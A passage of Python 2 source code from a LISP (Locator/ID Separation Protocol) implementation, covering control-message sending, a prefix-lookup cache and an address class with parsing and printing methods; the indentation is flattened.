ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in self.cache[ml].entries.values():
if (prefix.is_more_specific(entry.eid)): found = entry
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in self.cache[ml].entries.values():
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = len(t) / 2
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
